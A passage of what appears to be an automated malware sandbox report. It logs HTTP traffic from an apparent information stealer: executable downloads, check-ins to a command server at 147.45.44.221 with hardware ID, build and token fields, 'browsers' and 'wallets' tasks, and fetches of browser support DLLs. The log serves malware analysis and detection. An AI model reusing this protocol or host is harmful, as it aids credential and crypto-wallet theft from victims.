00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 ac 13 00 00 00 70 06 00 00 14 00 00 00 44 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 69 64 61 74 00 00 34 00 00 00 00 90 06 00 00 02 00 00 00 58 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f0 03 00 00 00 a0 06 00 00 04 00 00 00 5a 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 ac 3d 00 00 00 b0 06 00 00 3e 00 00 00 5e 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 21 Oct 2024 06:47:29 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 08:49:08 GMTETag: "1f3950-5e7ea271b0900"Accept-Ranges: bytesContent-Length: 2046288Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00 00 00 50 1e 00 78 03 00 00 00 00 00 00 00 00 00 00 00 0a 1f 00 50 2f 00 00 00 60 1e 00 5c 08 01 00 b0 01 1d 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 f0 19 00 a0 00 00 00 00 00 00 00 00 00 00 00 7c ca 1d 00 5c 04 00 00 80 26 1d 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 89 d7 19 00 00 10 00 00 00 d8 19 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 6c ef 03 00 00 f0 19 00 00 f0 03 00 00 dc 19 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 52 00 00 00 e0 1d 00 00 2e 00 00 00 cc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 40 1e 00 00 02 00 00 00 fa 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 50 1e 00 00 04 00 00 00 fc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 
72 65 6c 6f 63 00 00 5c 08 01 00 00 60 1e 00 00 0a 01 00 00 00 1e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 21 Oct 2024 06:47:31 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 08:49:08 GMTETag: "3ef50-5e7ea271b0900"Accept-Ranges: bytesContent-Length: 257872Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00 00 00 b0 03 00 80 03 00 00 00 00 00 00 00 00 00 00 00 c0 03 00 50 2f 00 00 00 c0 03 00 c8 35 00 00 38 71 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 e0 02 00 a0 00 00 00 00 00 00 00 00 00 00 00 14 7b 03 00 8c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 26 cb 02 00 00 10 00 00 00 cc 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 d4 ab 00 00 00 e0 02 00 00 ac 00 00 00 d0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 98 0b 00 00 00 90 03 00 00 08 00 00 00 7c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 a0 03 00 00 02 00 00 00 84 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 80 03 00 00 00 b0 03 00 00 04 00 00 00 86 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 
65 6c 6f 63 00 00 c8 35 00 00 00 c0 03 00 00 36 00 00 00 8a 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 21 Oct 2024 06:47:31 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 08:49:08 GMTETag: "13bf0-5e7ea271b0900"Accept-Ranges: bytesContent-Length: 80880Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 de 00 00 00 1c 00 00 00 00 00 00 90 d9 00 00 00 10 00 00 00 f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 30 01 00 00 04 00 00 d4 6d 01 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e0 e3 00 00 14 09 00 00 b8 00 01 00 8c 00 00 00 00 10 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 fa 00 00 f0 41 00 00 00 20 01 00 10 0a 00 00 80 20 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 20 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 b4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f4 dc 00 00 00 10 00 00 00 de 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 f4 05 00 00 00 f0 00 00 00 02 00 00 00 e2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 84 05 
00 00 00 00 01 00 00 06 00 00 00 e4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 00 04 00 00 00 10 01 00 00 04 00 00 00 ea 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 10 0a 00 00 00 20 01 00 00 0c 00 00 00 ee 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 147.45.44.221Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /28166bd28a5d19e6.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DAFBGHCAKKFCAKEBKJKKHost: 147.45.44.221Content-Length: 219Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 44 41 46 42 47 48 43 41 4b 4b 46 43 41 4b 45 42 4b 4a 4b 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 44 35 37 39 34 30 30 32 39 30 43 35 33 35 32 38 30 30 33 31 39 37 0d 0a 2d 2d 2d 2d 2d 2d 44 41 46 42 47 48 43 41 4b 4b 46 43 41 4b 45 42 4b 4a 4b 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 6e 66 7a 65 6f 6e 77 63 69 74 75 63 0d 0a 2d 2d 2d 2d 2d 2d 44 41 46 42 47 48 43 41 4b 4b 46 43 41 4b 45 42 4b 4a 4b 4b 2d 2d 0d 0a Data Ascii: ------DAFBGHCAKKFCAKEBKJKKContent-Disposition: form-data; name="hwid"D579400290C53528003197------DAFBGHCAKKFCAKEBKJKKContent-Disposition: form-data; name="build"nfzeonwcituc------DAFBGHCAKKFCAKEBKJKK--
Source: global traffic HTTP traffic detected: POST /28166bd28a5d19e6.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IECBGIDAEHCGDGCBKEBGHost: 147.45.44.221Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 49 45 43 42 47 49 44 41 45 48 43 47 44 47 43 42 4b 45 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 31 63 33 61 66 34 61 38 35 36 38 31 64 37 39 65 65 66 62 39 65 33 39 31 31 36 39 37 65 31 30 66 30 35 63 65 33 38 34 32 63 61 36 33 31 65 35 62 61 34 37 37 36 33 63 35 62 34 32 36 35 64 63 65 35 38 33 39 37 32 66 37 0d 0a 2d 2d 2d 2d 2d 2d 49 45 43 42 47 49 44 41 45 48 43 47 44 47 43 42 4b 45 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 62 72 6f 77 73 65 72 73 0d 0a 2d 2d 2d 2d 2d 2d 49 45 43 42 47 49 44 41 45 48 43 47 44 47 43 42 4b 45 42 47 2d 2d 0d 0a Data Ascii: ------IECBGIDAEHCGDGCBKEBGContent-Disposition: form-data; name="token"1c3af4a85681d79eefb9e3911697e10f05ce3842ca631e5ba47763c5b4265dce583972f7------IECBGIDAEHCGDGCBKEBGContent-Disposition: form-data; name="message"browsers------IECBGIDAEHCGDGCBKEBG--
Source: global traffic HTTP traffic detected: POST /28166bd28a5d19e6.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EHIIIJDAAAAAAKECBFBAHost: 147.45.44.221Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 45 48 49 49 49 4a 44 41 41 41 41 41 41 4b 45 43 42 46 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 31 63 33 61 66 34 61 38 35 36 38 31 64 37 39 65 65 66 62 39 65 33 39 31 31 36 39 37 65 31 30 66 30 35 63 65 33 38 34 32 63 61 36 33 31 65 35 62 61 34 37 37 36 33 63 35 62 34 32 36 35 64 63 65 35 38 33 39 37 32 66 37 0d 0a 2d 2d 2d 2d 2d 2d 45 48 49 49 49 4a 44 41 41 41 41 41 41 4b 45 43 42 46 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 45 48 49 49 49 4a 44 41 41 41 41 41 41 4b 45 43 42 46 42 41 2d 2d 0d 0a Data Ascii: ------EHIIIJDAAAAAAKECBFBAContent-Disposition: form-data; name="token"1c3af4a85681d79eefb9e3911697e10f05ce3842ca631e5ba47763c5b4265dce583972f7------EHIIIJDAAAAAAKECBFBAContent-Disposition: form-data; name="message"plugins------EHIIIJDAAAAAAKECBFBA--
Source: global traffic HTTP traffic detected: POST /28166bd28a5d19e6.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CAEGHIJEHJDHIDHIDAEHHost: 147.45.44.221Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 43 41 45 47 48 49 4a 45 48 4a 44 48 49 44 48 49 44 41 45 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 31 63 33 61 66 34 61 38 35 36 38 31 64 37 39 65 65 66 62 39 65 33 39 31 31 36 39 37 65 31 30 66 30 35 63 65 33 38 34 32 63 61 36 33 31 65 35 62 61 34 37 37 36 33 63 35 62 34 32 36 35 64 63 65 35 38 33 39 37 32 66 37 0d 0a 2d 2d 2d 2d 2d 2d 43 41 45 47 48 49 4a 45 48 4a 44 48 49 44 48 49 44 41 45 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 43 41 45 47 48 49 4a 45 48 4a 44 48 49 44 48 49 44 41 45 48 2d 2d 0d 0a Data Ascii: ------CAEGHIJEHJDHIDHIDAEHContent-Disposition: form-data; name="token"1c3af4a85681d79eefb9e3911697e10f05ce3842ca631e5ba47763c5b4265dce583972f7------CAEGHIJEHJDHIDHIDAEHContent-Disposition: form-data; name="message"fplugins------CAEGHIJEHJDHIDHIDAEH--
Source: global traffic HTTP traffic detected: POST /28166bd28a5d19e6.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BGIDBKKKKKFBGDGDHIDBHost: 147.45.44.221Content-Length: 5859Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /3538548809da56b2/sqlite3.dll HTTP/1.1Host: 147.45.44.221Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /28166bd28a5d19e6.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HJKJKKKJJJKJKFHJJJJEHost: 147.45.44.221Content-Length: 4599Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /28166bd28a5d19e6.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IECBGIDAEHCGDGCBKEBGHost: 147.45.44.221Content-Length: 1451Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /28166bd28a5d19e6.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EBKEHJJDAAAAKECBGHDAHost: 147.45.44.221Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 45 42 4b 45 48 4a 4a 44 41 41 41 41 4b 45 43 42 47 48 44 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 31 63 33 61 66 34 61 38 35 36 38 31 64 37 39 65 65 66 62 39 65 33 39 31 31 36 39 37 65 31 30 66 30 35 63 65 33 38 34 32 63 61 36 33 31 65 35 62 61 34 37 37 36 33 63 35 62 34 32 36 35 64 63 65 35 38 33 39 37 32 66 37 0d 0a 2d 2d 2d 2d 2d 2d 45 42 4b 45 48 4a 4a 44 41 41 41 41 4b 45 43 42 47 48 44 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 45 42 4b 45 48 4a 4a 44 41 41 41 41 4b 45 43 42 47 48 44 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 45 42 4b 45 48 4a 4a 44 41 41 41 41 4b 45 43 42 47 48 44 41 2d 2d 0d 0a Data Ascii: ------EBKEHJJDAAAAKECBGHDAContent-Disposition: form-data; name="token"1c3af4a85681d79eefb9e3911697e10f05ce3842ca631e5ba47763c5b4265dce583972f7------EBKEHJJDAAAAKECBGHDAContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------EBKEHJJDAAAAKECBGHDAContent-Disposition: form-data; name="file"------EBKEHJJDAAAAKECBGHDA--
Source: global traffic HTTP traffic detected: POST /28166bd28a5d19e6.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EGCFIDAFBFBAKFHJEGIJHost: 147.45.44.221Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 45 47 43 46 49 44 41 46 42 46 42 41 4b 46 48 4a 45 47 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 31 63 33 61 66 34 61 38 35 36 38 31 64 37 39 65 65 66 62 39 65 33 39 31 31 36 39 37 65 31 30 66 30 35 63 65 33 38 34 32 63 61 36 33 31 65 35 62 61 34 37 37 36 33 63 35 62 34 32 36 35 64 63 65 35 38 33 39 37 32 66 37 0d 0a 2d 2d 2d 2d 2d 2d 45 47 43 46 49 44 41 46 42 46 42 41 4b 46 48 4a 45 47 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 45 47 43 46 49 44 41 46 42 46 42 41 4b 46 48 4a 45 47 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 45 47 43 46 49 44 41 46 42 46 42 41 4b 46 48 4a 45 47 49 4a 2d 2d 0d 0a Data Ascii: ------EGCFIDAFBFBAKFHJEGIJContent-Disposition: form-data; name="token"1c3af4a85681d79eefb9e3911697e10f05ce3842ca631e5ba47763c5b4265dce583972f7------EGCFIDAFBFBAKFHJEGIJContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------EGCFIDAFBFBAKFHJEGIJContent-Disposition: form-data; name="file"------EGCFIDAFBFBAKFHJEGIJ--
Source: global traffic HTTP traffic detected: GET /3538548809da56b2/freebl3.dll HTTP/1.1Host: 147.45.44.221Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /3538548809da56b2/mozglue.dll HTTP/1.1Host: 147.45.44.221Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /3538548809da56b2/msvcp140.dll HTTP/1.1Host: 147.45.44.221Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /3538548809da56b2/nss3.dll HTTP/1.1Host: 147.45.44.221Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /3538548809da56b2/softokn3.dll HTTP/1.1Host: 147.45.44.221Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /3538548809da56b2/vcruntime140.dll HTTP/1.1Host: 147.45.44.221Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /28166bd28a5d19e6.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KJEHCGDBFCBAKECBKKEBHost: 147.45.44.221Content-Length: 1067Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /28166bd28a5d19e6.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GHDHJEBFBFHJECAKFCAAHost: 147.45.44.221Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 47 48 44 48 4a 45 42 46 42 46 48 4a 45 43 41 4b 46 43 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 31 63 33 61 66 34 61 38 35 36 38 31 64 37 39 65 65 66 62 39 65 33 39 31 31 36 39 37 65 31 30 66 30 35 63 65 33 38 34 32 63 61 36 33 31 65 35 62 61 34 37 37 36 33 63 35 62 34 32 36 35 64 63 65 35 38 33 39 37 32 66 37 0d 0a 2d 2d 2d 2d 2d 2d 47 48 44 48 4a 45 42 46 42 46 48 4a 45 43 41 4b 46 43 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 61 6c 6c 65 74 73 0d 0a 2d 2d 2d 2d 2d 2d 47 48 44 48 4a 45 42 46 42 46 48 4a 45 43 41 4b 46 43 41 41 2d 2d 0d 0a Data Ascii: ------GHDHJEBFBFHJECAKFCAAContent-Disposition: form-data; name="token"1c3af4a85681d79eefb9e3911697e10f05ce3842ca631e5ba47763c5b4265dce583972f7------GHDHJEBFBFHJECAKFCAAContent-Disposition: form-data; name="message"wallets------GHDHJEBFBFHJECAKFCAA--
